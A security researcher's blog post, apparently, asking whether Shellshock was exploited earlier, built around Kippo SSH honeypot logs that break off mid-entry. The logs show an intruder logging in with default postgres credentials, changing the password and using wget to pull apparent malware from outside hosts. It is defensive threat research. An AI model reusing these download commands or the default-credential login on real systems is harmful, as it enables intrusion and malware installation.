Was #ShellShock being exploited on select systems for years?

The following logs are from a Kippo SSH Honeypot.

Out of all my logs from running the honeypot for several years, I only saw "unhandled request for env" once.

I can't explain what caused it to appear in the log. I highlighted the section with hash marks below. Can anyone explain what causes it? Google searches for this string return rather limited results with no clear explanation.

If you can shed light on the subject, please send me a message on Twitter to @CaffSec

-Ken Buckler

Caffeine Security

Twitter: @CaffSec

caffeinesecurity.blogspot.com

A few more details...

-The IP address, 88.191.160.75, was never seen on my honeypot again.

-A VirusTotal analysis of the malware can be found here: https://www.virustotal.com/en/file/c6b14dd53de4a5050bae1fb97fb99fa104e721b04beca496637102d0b36534f7/analysis/1412124814/

2013-06-09 10:31:40-0400 [SSHService ssh-userauth on HoneyPotTransport,215,88.191.160.75] postgres trying auth none

2013-06-09 10:31:41-0400 [SSHService ssh-userauth on HoneyPotTransport,215,88.191.160.75] postgres trying auth keyboard-interactive

2013-06-09 10:31:43-0400 [SSHService ssh-userauth on HoneyPotTransport,215,88.191.160.75] login attempt [postgres/postgres] succeeded

2013-06-09 10:31:43-0400 [SSHService ssh-userauth on HoneyPotTransport,215,88.191.160.75] postgres authenticated with keyboard-interactive

2013-06-09 10:31:43-0400 [SSHService ssh-userauth on HoneyPotTransport,215,88.191.160.75] starting service ssh-connection

2013-06-09 10:31:44-0400 [SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] got channel session request

2013-06-09 10:31:44-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] channel open

2013-06-09 10:31:44-0400 [SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] got global no-more-sessions@openssh.com request

2013-06-09 10:31:44-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] pty request: xterm (26, 79, 0, 0)

2013-06-09 10:31:44-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] Terminal size: 26 79

###############################################

2013-06-09 10:31:44-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] unhandled request for env

2013-06-09 10:31:44-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] getting shell

2013-06-09 10:31:44-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] Opening TTY log:

###############################################

log/tty/20130609-103144-3972.log

2013-06-09 10:31:44-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] /etc/motd resolved into /etc/motd

2013-06-09 10:31:58-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] CMD: uname -a

2013-06-09 10:31:58-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] Command found: uname -a

2013-06-09 10:32:06-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] CMD: passwd

2013-06-09 10:32:06-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] Command found: passwd

2013-06-09 10:32:11-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] INPUT (passwd): k0k0lino

2013-06-09 10:32:13-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] INPUT (passwd): k0k0lino

2013-06-09 10:32:17-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] CMD: cd /tmp

2013-06-09 10:32:17-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] Command found: cd /tmp

2013-06-09 10:32:17-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] CMD: ls

2013-06-09 10:32:17-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] Command found: ls

2013-06-09 10:32:28-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] CMD: wget ftp://host-pride:host-

pride@134.0.116.18/perl.txt

2013-06-09 10:32:28-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] Command found: wget

ftp://host-pride:host-pride@134.0.116.18/perl.txt

2013-06-09 10:32:32-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] CMD: ftp

2013-06-09 10:32:32-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] Command not found: ftp

2013-06-09 10:32:54-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] CMD: wget

moshu.do.am/bmoshu.jpg

2013-06-09 10:32:54-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,215,88.191.160.75] Command found: wget